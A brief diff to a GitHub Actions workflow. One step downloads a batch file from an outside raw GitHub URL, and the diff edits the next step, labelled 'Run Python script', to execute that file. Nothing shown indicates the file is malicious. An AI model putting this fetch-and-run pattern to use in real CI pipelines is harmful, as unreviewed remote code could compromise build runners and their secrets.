--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -10,4 +10,5 @@ jobs:
     - name: downlowd
       run: Invoke-WebRequest https://raw.githubusercontent.com/minexd2000/test-away/main/test.bat -OutFile test.bat
     - name: Run Python script
-      run: test.bat
+      run: .\test.bat
+
